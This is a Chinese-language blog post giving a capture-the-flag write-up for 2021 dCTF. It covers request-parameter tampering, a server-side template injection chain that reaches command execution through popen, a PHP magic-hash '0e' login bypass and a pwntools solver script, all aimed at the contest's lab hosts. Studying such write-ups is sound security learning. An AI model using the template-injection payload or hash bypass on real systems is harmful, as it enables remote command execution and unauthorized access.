<!doctype html><html lang=en><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge,chrome=1"><title>2021 dCTF - Zhe'BLog</title><meta name=renderer content="webkit"><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1"><meta http-equiv=cache-control content="no-transform"><meta http-equiv=cache-control content="no-siteapp"><meta name=theme-color content="#f8f5ec"><meta name=msapplication-navbutton-color content="#f8f5ec"><meta name=apple-mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-status-bar-style content="#f8f5ec"><meta name=author content="Zhe"><meta name=description content="https://dctf.dragonsec.si/challenges Simple web（web） 访问http://dctf1-chall-simple-web.westeurope.azurecontainer.io"><meta name=generator content="Hugo 0.80.0 with theme even"><link rel=canonical href=https://Zh3-H4ck.github.io/post/2021-dctf/><link rel=apple-touch-icon sizes=180x180 href=/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicon-16x16.png><link rel=manifest href=/manifest.json><link rel=mask-icon href=/safari-pinned-tab.svg color=#5bbad5><link href=/sass/main.min.8e26a09b7b99e8ec3a22900de69b02b568e23ace71d66ebfdb13fa655d365f1f.css rel=stylesheet><link rel=stylesheet href=https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin=anonymous><meta property="og:title" content="2021 dCTF"><meta property="og:description" content="https://dctf.dragonsec.si/challenges Simple web（web） 访问http://dctf1-chall-simple-web.westeurope.azurecontainer.io"><meta property="og:type" content="article"><meta property="og:url" content="https://Zh3-H4ck.github.io/post/2021-dctf/"><meta property="article:published_time" content="2021-05-15T20:49:14+08:00"><meta property="article:modified_time" content="2021-05-15T20:49:14+08:00"><meta itemprop=name content="2021 dCTF"><meta itemprop=description content="https://dctf.dragonsec.si/challenges Simple web（web） 访问http://dctf1-chall-simple-web.westeurope.azurecontainer.io"><meta itemprop=datePublished content="2021-05-15T20:49:14+08:00"><meta itemprop=dateModified content="2021-05-15T20:49:14+08:00"><meta itemprop=wordCount content="1764"><meta itemprop=keywords content><meta name=twitter:card content="summary"><meta name=twitter:title content="2021 dCTF"><meta name=twitter:description content="https://dctf.dragonsec.si/challenges Simple web（web） 访问http://dctf1-chall-simple-web.westeurope.azurecontainer.io"><!--[if lte IE 9]><script src=https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js></script><![endif]--><!--[if lt IE 9]><script src=https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js></script><script src=https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js></script><![endif]--></head><body><div id=mobile-navbar class=mobile-navbar><div class=mobile-header-logo><a href=/ class=logo>Zhe'Blog</a></div><div class=mobile-navbar-icon><span></span><span></span><span></span></div></div><nav id=mobile-menu class="mobile-menu slideout-menu"><ul class=mobile-menu-list><a href=/><li class=mobile-menu-item>Home</li></a><a href=/post/><li class=mobile-menu-item>Archives</li></a><a href=/tags/><li class=mobile-menu-item>Tags</li></a><a href=/categories/><li class=mobile-menu-item>Categories</li></a><a href=/about/><li class=mobile-menu-item>About</li></a></ul></nav><div class=container id=mobile-panel><header id=header class=header><div class=logo-wrapper><a href=/ class=logo>Zhe'Blog</a></div><nav class=site-navbar><ul id=menu class=menu><li class=menu-item><a class=menu-item-link href=/>Home</a></li><li class=menu-item><a class=menu-item-link href=/post/>Archives</a></li><li class=menu-item><a class=menu-item-link href=/tags/>Tags</a></li><li class=menu-item><a class=menu-item-link href=/categories/>Categories</a></li><li class=menu-item><a class=menu-item-link href=/about/>About</a></li></ul></nav></header><main id=main class=main><div class=content-wrapper><div id=content class=content><article class=post><header class=post-header><h1 class=post-title>2021 dCTF</h1><div class=post-meta><span class=post-time>2021-05-15</span></div></header><div class=post-toc id=post-toc><h2 class=post-toc-title>Contents</h2><div class="post-toc-content always-active"><nav id=TableOfContents><ul><li><ul><li><a href=#simple-webweb>Simple web（web）</a></li><li><a href=#injection>Injection</a></li><li><a href=#very-secure-website>Very secure website</a></li><li><a href=#bell>Bell</a></li><li><a href=#just-in-time>Just In Time</a></li></ul></li></ul></nav></div></div><div class=post-content><p><a href=https://dctf.dragonsec.si/challenges>https://dctf.dragonsec.si/challenges</a></p><h2 id=simple-webweb>Simple web（web）</h2><p><img src=assets/image-20210516205454863.png alt=image-20210516205454863></p><p>访问http://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080/，页面如下</p><p><img src=assets/image-20210516205525623.png alt=image-20210516205525623></p><p>勾选并Submit，页面显示<strong>Not authorized</strong></p><p>查看提交数据</p><p><img src=assets/image-20210516205616133.png alt=image-20210516205616133></p><p>修改请求体中的<strong>auth=1</strong></p><p><img src=assets/image-20210516205646433.png alt=image-20210516205646433></p><p>页面返回flag信息<strong>ctf{w3b_c4n_b3_fun_r1ght?}</strong></p><h2 id=injection>Injection</h2><p><img src=assets/image-20210516210326614.png alt=image-20210516210326614></p><p>访问http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/，页面显示如下</p><p><img src=assets/image-20210516210343773.png alt=image-20210516210343773></p><p>输入任意账号密码，提交后，页面返回<strong>Oops! Page login doesn&rsquo;t exist :(</strong></p><p>我后续尝试过爆路径等方式企图获取更多信息，但失败了。</p><p>后面从错误信息和response头部获取到相关信息，服务器用的是waitress，是Python WSGI server，所以判断是个SSTI，所以做一下尝试</p><p>访问http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/%7B%7B1+1%7D%7D，页面返回Oops! Page 2 doesn&rsquo;t exist :(，说明存在SSTI漏洞</p><p>接下来利用以下方法进行命令执行</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span><span class=lnt>5
</span><span class=lnt>6
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-fallback data-lang=fallback>1.{{&#39;&#39;.__class__}}   # 获得单引号的类型
2.{{&#39;&#39;.__class__.__base__}} #获得object
3.{{&#39;&#39;.__class__.__base__.__subclasses__()}}#获得基类
4.{{&#39;&#39;.__class__.__base__.__subclasses__()[133]}}#这里我们利用的是&lt;class &#39;os._wrap_close&#39;&gt;类，根据第二步获取的列表去修改这里的索引，本次是133
5.{{&#39;&#39;.__class__.__base__.__subclasses__()[133].__init__.__globals__}}#将该类实例化并且全局搜索查找所有的方法、变量和参数
6.{{&#39;&#39;.__class__.__base__.__subclasses__()[133].__init__.__globals__[&#39;popen&#39;](&#39;ls&#39;).read()}}#利用popen函数执行命令
</code></pre></td></tr></table></div></div><p>接下来就比较简单了。去查找flag，最终在**./lib/security.py**找到关键信息</p><p>访问</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code><span class=lnt>1
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-fallback data-lang=fallback>http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/%7B%7B&#39;&#39;.__class__.__base__.__subclasses__()[133].__init__.__globals__[&#39;popen&#39;](&#39;cat%20./lib/security.py&#39;).read()%7D%7D
</code></pre></td></tr></table></div></div><p>获取security.py的内容</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span><span class=lnt>5
</span><span class=lnt>6
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-python data-lang=python><span class=kn>import</span> <span class=nn>base64</span> 
<span class=k>def</span> <span class=nf>validate_login</span><span class=p>(</span><span class=n>username</span><span class=p>,</span> <span class=n>password</span><span class=p>):</span> 
    <span class=k>if</span> <span class=n>username</span> <span class=o>!=</span> <span class=s1>&#39;admin&#39;</span><span class=p>:</span> 
        <span class=k>return</span> <span class=bp>False</span> 
    <span class=n>valid_password</span> <span class=o>=</span> <span class=s1>&#39;QfsFjdz81cx8Fd1Bnbx8lczMXdfxGb0snZ0NGZ&#39;</span> 
    <span class=k>return</span> <span class=n>base64</span><span class=o>.</span><span class=n>b64encode</span><span class=p>(</span><span class=n>password</span><span class=o>.</span><span class=n>encode</span><span class=p>(</span><span class=s1>&#39;ascii&#39;</span><span class=p>))</span><span class=o>.</span><span class=n>decode</span><span class=p>(</span><span class=s1>&#39;ascii&#39;</span><span class=p>)[::</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span><span class=o>.</span><span class=n>lstrip</span><span class=p>(</span><span class=s1>&#39;=&#39;</span><span class=p>)</span> <span class=o>==</span> <span class=n>valid_password</span>
</code></pre></td></tr></table></div></div><p>对valid_password反序后base64解码，就能获得flag：<strong>dctf{4ll_us3r_1nput_1s_3v1l}</strong></p><h2 id=very-secure-website>Very secure website</h2><p><img src=assets/image-20210516212247619.png alt=image-20210516212247619></p><p>访问http://dctf1-chall-very-secure-site.westeurope.azurecontainer.io/，页面显示如下</p><p><img src=assets/image-20210516212324484.png alt=image-20210516212324484></p><p>查看<strong>source code</strong></p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code><span class=lnt> 1
</span><span class=lnt> 2
</span><span class=lnt> 3
</span><span class=lnt> 4
</span><span class=lnt> 5
</span><span class=lnt> 6
</span><span class=lnt> 7
</span><span class=lnt> 8
</span><span class=lnt> 9
</span><span class=lnt>10
</span><span class=lnt>11
</span><span class=lnt>12
</span><span class=lnt>13
</span><span class=lnt>14
</span><span class=lnt>15
</span><span class=lnt>16
</span><span class=lnt>17
</span><span class=lnt>18
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-php data-lang=php><span class=o>&lt;?</span><span class=nx>php</span>
    <span class=k>if</span> <span class=p>(</span><span class=nx>isset</span><span class=p>(</span><span class=nv>$_GET</span><span class=p>[</span><span class=s1>&#39;username&#39;</span><span class=p>])</span> <span class=k>and</span> <span class=nx>isset</span><span class=p>(</span><span class=nv>$_GET</span><span class=p>[</span><span class=s1>&#39;password&#39;</span><span class=p>]))</span> <span class=p>{</span>
        <span class=k>if</span> <span class=p>(</span><span class=nx>hash</span><span class=p>(</span><span class=s2>&#34;tiger128,4&#34;</span><span class=p>,</span> <span class=nv>$_GET</span><span class=p>[</span><span class=s1>&#39;username&#39;</span><span class=p>])</span> <span class=o>!=</span> <span class=s2>&#34;51c3f5f5d8a8830bc5d8b7ebcb5717df&#34;</span><span class=p>)</span> <span class=p>{</span>
            <span class=k>echo</span> <span class=s2>&#34;Invalid username&#34;</span><span class=p>;</span>
        <span class=p>}</span>
        <span class=k>else</span> <span class=k>if</span> <span class=p>(</span><span class=nx>hash</span><span class=p>(</span><span class=s2>&#34;tiger128,4&#34;</span><span class=p>,</span> <span class=nv>$_GET</span><span class=p>[</span><span class=s1>&#39;password&#39;</span><span class=p>])</span> <span class=o>==</span> <span class=s2>&#34;0e132798983807237937411964085731&#34;</span><span class=p>)</span> <span class=p>{</span>
            <span class=nv>$flag</span> <span class=o>=</span> <span class=nx>fopen</span><span class=p>(</span><span class=s2>&#34;flag.txt&#34;</span><span class=p>,</span> <span class=s2>&#34;r&#34;</span><span class=p>)</span> <span class=k>or</span> <span class=k>die</span><span class=p>(</span><span class=s2>&#34;Cannot open file&#34;</span><span class=p>);</span>
            <span class=k>echo</span> <span class=nx>fread</span><span class=p>(</span><span class=nv>$flag</span><span class=p>,</span> <span class=nx>filesize</span><span class=p>(</span><span class=s2>&#34;flag.txt&#34;</span><span class=p>));</span>
            <span class=nx>fclose</span><span class=p>(</span><span class=nv>$flag</span><span class=p>);</span>
        <span class=p>}</span>
        <span class=k>else</span> <span class=p>{</span>
            <span class=k>echo</span> <span class=s2>&#34;Try harder&#34;</span><span class=p>;</span>
        <span class=p>}</span>
    <span class=p>}</span>
    <span class=k>else</span> <span class=p>{</span>
        <span class=k>echo</span> <span class=s2>&#34;Invalid parameters&#34;</span><span class=p>;</span>
    <span class=p>}</span>
<span class=cp>?&gt;</span><span class=err>
</span></code></pre></td></tr></table></div></div><p>代码里用了hash算法中的<strong>tiger128，4</strong>，用关键字去搜索得到以下结果</p><p><img src=assets/image-20210516212535704.png alt=image-20210516212535704></p><p>所以用户名是admin</p><p>（密码的密文搜不到）</p><p>又看到密码判断的时候，用的是**==**，且密文是0e开头的。所以我们也找一个字符串hash后的密文也是以0e开头的就可以了</p><p>在这个网址我们找到了我们想要的内容</p><p><a href=https://www.cnblogs.com/Oran9e/p/6537204.html>https://www.cnblogs.com/Oran9e/p/6537204.html</a></p><p><img src=assets/image-20210516212830982.png alt=image-20210516212830982></p><p>所以我们在登录页面，输入<strong>admin:479763000</strong>，就能登录成功并获取到flag：<strong>dctf{It&rsquo;s_magic._I_ain&rsquo;t_gotta_explain_shit.}</strong></p><blockquote><p>备注一个网站，https://md5hashing.net/hash/tiger128,4，该网站可以计算hash和搜索一些已知的hash明文</p></blockquote><h2 id=bell>Bell</h2><p><img src=assets/image-20210516224615069.png alt=image-20210516224615069></p><p>文件拖入IDA内进行分析</p><p>main函数（随机数生成并打印）</p><p><img src=assets/image-20210516224651957.png alt=image-20210516224651957></p><p>process函数（遍历并检查输入与预期是否相同）：</p><p><img src=assets/image-20210516224730346.png alt=image-20210516224730346></p><p>triangle函数（是一个递归函数）：</p><p><img src=assets/image-20210516224949004.png alt=image-20210516224949004></p><p>根据以上内容，写出脚本，如下</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code><span class=lnt> 1
</span><span class=lnt> 2
</span><span class=lnt> 3
</span><span class=lnt> 4
</span><span class=lnt> 5
</span><span class=lnt> 6
</span><span class=lnt> 7
</span><span class=lnt> 8
</span><span class=lnt> 9
</span><span class=lnt>10
</span><span class=lnt>11
</span><span class=lnt>12
</span><span class=lnt>13
</span><span class=lnt>14
</span><span class=lnt>15
</span><span class=lnt>16
</span><span class=lnt>17
</span><span class=lnt>18
</span><span class=lnt>19
</span><span class=lnt>20
</span><span class=lnt>21
</span><span class=lnt>22
</span><span class=lnt>23
</span><span class=lnt>24
</span><span class=lnt>25
</span><span class=lnt>26
</span><span class=lnt>27
</span><span class=lnt>28
</span><span class=lnt>29
</span><span class=lnt>30
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-python data-lang=python><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=n>remote</span> <span class=c1>#pip install pwntools</span>
<span class=kn>from</span> <span class=nn>hashlib</span> <span class=kn>import</span> <span class=n>sha256</span>

<span class=k>def</span> <span class=nf>solvepow</span><span class=p>(</span><span class=n>p</span><span class=p>):</span>
    <span class=n>n</span> <span class=o>=</span> <span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()</span>
    <span class=n>n</span><span class=o>=</span><span class=nb>int</span><span class=p>(</span><span class=n>n</span><span class=p>)</span>
    <span class=k>print</span><span class=p>(</span><span class=n>n</span><span class=p>)</span>
    <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=nb>range</span><span class=p>(</span><span class=mi>1</span><span class=p>,</span><span class=n>n</span><span class=o>+</span><span class=mi>1</span><span class=p>):</span>
        <span class=n>t</span><span class=o>=</span><span class=n>triangle</span><span class=p>(</span><span class=n>n</span><span class=p>,</span><span class=n>i</span><span class=p>)</span>
        <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=nb>str</span><span class=p>(</span><span class=n>t</span><span class=p>))</span>
    <span class=k>print</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()</span><span class=o>.</span><span class=n>decode</span><span class=p>())</span>
    
    
<span class=k>def</span> <span class=nf>triangle</span><span class=p>(</span><span class=n>a1</span><span class=p>,</span><span class=n>a2</span><span class=p>):</span>
    <span class=k>if</span> <span class=n>a2</span><span class=o>&gt;</span><span class=n>a1</span><span class=p>:</span>
        <span class=k>return</span> <span class=mi>0</span>
    <span class=k>if</span> <span class=n>a1</span><span class=o>==</span><span class=mi>1</span> <span class=ow>and</span> <span class=n>a2</span><span class=o>==</span><span class=mi>1</span><span class=p>:</span>
        <span class=k>return</span> <span class=mi>1</span>
    <span class=k>if</span> <span class=n>a2</span><span class=o>==</span><span class=mi>1</span><span class=p>:</span>
        <span class=k>return</span> <span class=n>triangle</span><span class=p>(</span><span class=n>a1</span><span class=o>-</span><span class=mi>1</span><span class=p>,</span><span class=n>a1</span><span class=o>-</span><span class=mi>1</span><span class=p>)</span>
    <span class=n>t</span> <span class=o>=</span> <span class=n>triangle</span><span class=p>(</span><span class=n>a1</span><span class=p>,</span><span class=n>a2</span><span class=o>-</span><span class=mi>1</span><span class=p>)</span>
    <span class=k>return</span> <span class=n>t</span><span class=o>+</span><span class=n>triangle</span><span class=p>(</span><span class=n>a1</span><span class=o>-</span><span class=mi>1</span><span class=p>,</span><span class=n>a2</span><span class=o>-</span><span class=mi>1</span><span class=p>)</span>
<span class=k>def</span> <span class=nf>exploit</span><span class=p>(</span><span class=n>p</span><span class=p>):</span>
    <span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>

<span class=k>if</span> <span class=vm>__name__</span> <span class=o>==</span> <span class=s1>&#39;__main__&#39;</span><span class=p>:</span>
    <span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s1>&#39;dctf-chall-bell.westeurope.azurecontainer.io&#39;</span><span class=p>,</span> <span class=mi>5311</span><span class=p>)</span>
    <span class=n>solvepow</span><span class=p>(</span><span class=n>p</span><span class=p>)</span>
    <span class=n>exploit</span><span class=p>(</span><span class=n>p</span><span class=p>)</span>

</code></pre></td></tr></table></div></div><p>flag：<strong>dctf{f1rst_step_t0wards_b3ll_l4bs}</strong></p><h2 id=just-in-time>Just In Time</h2><p>refer</p><p><a href=https://blog.csdn.net/qq_46091464/article/details/109030194>https://blog.csdn.net/qq_46091464/article/details/109030194</a></p></div><div class=post-copyright><p class=copyright-item><span class=item-title>Author</span>
<span class=item-content>Zhe</span></p><p class=copyright-item><span class=item-title>LastMod</span>
<span class=item-content>2021-05-15</span></p></div><footer class=post-footer><nav class=post-nav><a class=next href=/post/2021-s4ctf/><span class="next-text nav-default">2021 S4CTF</span>
<span class="next-text nav-mobile">Next</span>
<i class="iconfont icon-right"></i></a></nav></footer></article></div></div></main><footer id=footer class=footer><div class=social-links><a href=https://zh3-h4ck.github.io class="iconfont icon-github" title=github></a><a href=https://Zh3-H4ck.github.io/index.xml type=application/rss+xml class="iconfont icon-rss" title=rss></a></div><div class=copyright><span class=power-by>Powered by <a class=hexo-link href=https://gohugo.io>Hugo</a></span>
<span class=division>|</span>
<span class=theme-info>Theme -
<a class=theme-link href=https://github.com/olOwOlo/hugo-theme-even>Even</a></span>
<span class=copyright-year>&copy;
2020 -
2021<span class=heart><i class="iconfont icon-heart"></i></span><span>Zhe</span></span></div></footer><div class=back-to-top id=back-to-top><i class="iconfont icon-up"></i></div></div><script src=https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin=anonymous></script><script src=https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin=anonymous></script><script src=https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin=anonymous></script><script type=text/javascript src=/js/main.min.c12618f9a600c40bd024996677e951e64d3487006775aeb22e200c990006c5c7.js></script></body></html>